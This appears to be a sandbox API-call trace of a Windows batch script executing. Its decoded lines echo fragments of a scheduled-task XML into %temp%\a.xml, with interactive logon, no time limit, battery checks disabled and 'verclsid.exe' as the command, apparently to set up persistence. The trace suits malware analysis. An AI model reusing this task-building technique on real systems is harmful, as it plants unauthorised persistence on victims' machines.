[0375.707] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.707] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1405, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x57d
[0375.707] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=36, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\n>> %temp%\\a.xml\r\n") returned 36
[0375.707] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.707] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x57d
[0375.707] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.707] GetFileType (hFile=0x5c) returned 0x1
[0375.707] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x57d
[0375.707] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.707] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1442, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5a2
[0375.708] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=37, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\n> %temp%\\a.xml\r\n") returned 37
[0375.708] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.708] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5a2
[0375.708] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.708] GetFileType (hFile=0x5c) returned 0x1
[0375.708] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5a2
[0375.708] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.708] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1494, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5d6
[0375.708] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=52, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\n\n") returned 52
[0375.709] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.709] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5d6
[0375.709] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.709] GetFileType (hFile=0x5c) returned 0x1
[0375.709] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5d6
[0375.709] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.709] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1560, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x618
[0375.709] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^InteractiveToken^ >> %temp%\\a.xml\r\n", cbMultiByte=66, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^InteractiveToken^ >> %temp%\\a.xml\r\n\r\n") returned 66
[0375.709] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.710] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x618
[0375.710] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.710] GetFileType (hFile=0x5c) returned 0x1
[0375.710] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x618
[0375.710] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.710] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1597, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x63d
[0375.710] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=37, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\nLogonType^> >> %temp%\\a.xml\r\n") returned 37
[0375.710] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.710] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x63d
[0375.711] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.711] GetFileType (hFile=0x5c) returned 0x1
[0375.711] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x63d
[0375.711] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.711] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1635, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x663
[0375.711] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=38, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\nogonType^> >> %temp%\\a.xml\r\n") returned 38
[0375.711] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.711] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x663
[0375.711] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.712] GetFileType (hFile=0x5c) returned 0x1
[0375.712] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x663
[0375.712] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.712] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1670, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x686
[0375.712] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=35, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\nl\r\n") returned 35
[0375.712] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.712] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x686
[0375.712] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.712] GetFileType (hFile=0x5c) returned 0x1
[0375.713] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x686
[0375.713] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.713] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1757, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6dd
[0375.713] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^IgnoreNew^ >> %temp%\\a.xml\r\n", cbMultiByte=87, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^IgnoreNew^ >> %temp%\\a.xml\r\nk\"^> >> %temp%\\a.xml\r\n") returned 87
[0375.713] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.713] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6dd
[0375.713] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.713] GetFileType (hFile=0x5c) returned 0x1
[0375.713] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6dd
[0375.714] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.714] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1846, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x736
[0375.714] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^false^ >> %temp%\\a.xml\r\n", cbMultiByte=89, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^false^ >> %temp%\\a.xml\r\n^> >> %temp%\\a.xml\r\n") returned 89
[0375.714] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.714] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x736
[0375.714] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.714] GetFileType (hFile=0x5c) returned 0x1
[0375.714] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x736
[0375.715] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.715] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1927, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x787
[0375.715] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^false^ >> %temp%\\a.xml\r\n", cbMultiByte=81, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^false^ >> %temp%\\a.xml\r\n\\a.xml\r\n") returned 81
[0375.715] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.715] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x787
[0375.715] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.715] GetFileType (hFile=0x5c) returned 0x1
[0375.715] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x787
[0375.715] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.716] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1966, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7ae
[0375.716] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=39, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\nStopIfGoingOnBatteries^> >> %temp%\\a.xml\r\n") returned 39
[0375.716] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.716] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7ae
[0375.716] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.716] GetFileType (hFile=0x5c) returned 0x1
[0375.716] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7ae
[0375.716] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.716] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2029, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7ed
[0375.717] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^false^ >> %temp%\\a.xml\r\n", cbMultiByte=63, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^false^ >> %temp%\\a.xml\r\n >> %temp%\\a.xml\r\n") returned 63
[0375.717] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.717] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7ed
[0375.717] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.717] GetFileType (hFile=0x5c) returned 0x1
[0375.717] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7ed
[0375.717] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.717] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2092, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x82c
[0375.717] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^false^ >> %temp%\\a.xml\r\n", cbMultiByte=63, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^false^ >> %temp%\\a.xml\r\n") returned 63
[0375.718] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.718] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82c
[0375.718] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.718] GetFileType (hFile=0x5c) returned 0x1
[0375.718] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82c
[0375.718] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.718] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2132, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x854
[0375.718] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=40, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\ndle^> >> %temp%\\a.xml\r\n") returned 40
[0375.718] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.719] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x854
[0375.719] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.719] GetFileType (hFile=0x5c) returned 0x1
[0375.719] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x854
[0375.719] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.719] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2204, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x89c
[0375.719] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^true^ >> %temp%\\a.xml\r\n", cbMultiByte=72, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^true^ >> %temp%\\a.xml\r\n%\\a.xml\r\n") returned 72
[0375.719] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.719] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x89c
[0375.720] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.720] GetFileType (hFile=0x5c) returned 0x1
[0375.720] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x89c
[0375.720] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.720] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2252, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8cc
[0375.720] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^true^ >> %temp%\\a.xml\r\n", cbMultiByte=48, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^true^ >> %temp%\\a.xml\r\nmand^> >> %temp%\\a.xml\r\n") returned 48
[0375.720] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.720] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8cc
[0375.720] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.720] GetFileType (hFile=0x5c) returned 0x1
[0375.721] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8cc
[0375.721] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.721] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2324, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x914
[0375.721] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^PT0S^ >> %temp%\\a.xml\r\n", cbMultiByte=72, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^PT0S^ >> %temp%\\a.xml\r\n") returned 72
[0375.721] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.721] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x914
[0375.721] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.721] GetFileType (hFile=0x5c) returned 0x1
[0375.721] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x914
[0375.722] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.722] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2360, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x938
[0375.722] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=36, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\necutionTimeLimit^> >> %temp%\\a.xml\r\n") returned 36
[0375.722] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.723] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x938
[0375.723] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.723] GetFileType (hFile=0x5c) returned 0x1
[0375.723] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x938
[0375.724] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.724] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2415, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x96f
[0375.724] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=55, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\n>> %temp%\\a.xml\r\n") returned 55
[0375.724] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.724] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x96f
[0375.724] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.724] GetFileType (hFile=0x5c) returned 0x1
[0375.725] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x96f
[0375.725] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.725] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2446, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x98e
[0375.725] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=31, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\nME%\"^> >> %temp%\\a.xml\r\n") returned 31
[0375.725] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.725] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98e
[0375.725] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.725] GetFileType (hFile=0x5c) returned 0x1
[0375.725] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98e
[0375.726] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.726] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2506, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ca
[0375.726] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^\"verclsid.exe\"^ >> %temp%\\a.xml\r\n", cbMultiByte=60, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^\"verclsid.exe\"^ >> %temp%\\a.xml\r\nemp%\\a.xml\r\n") returned 60
[0375.726] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.726] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ca
[0375.726] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.726] GetFileType (hFile=0x5c) returned 0x1
[0375.726] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ca
[0375.726] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.726] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2600, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa28
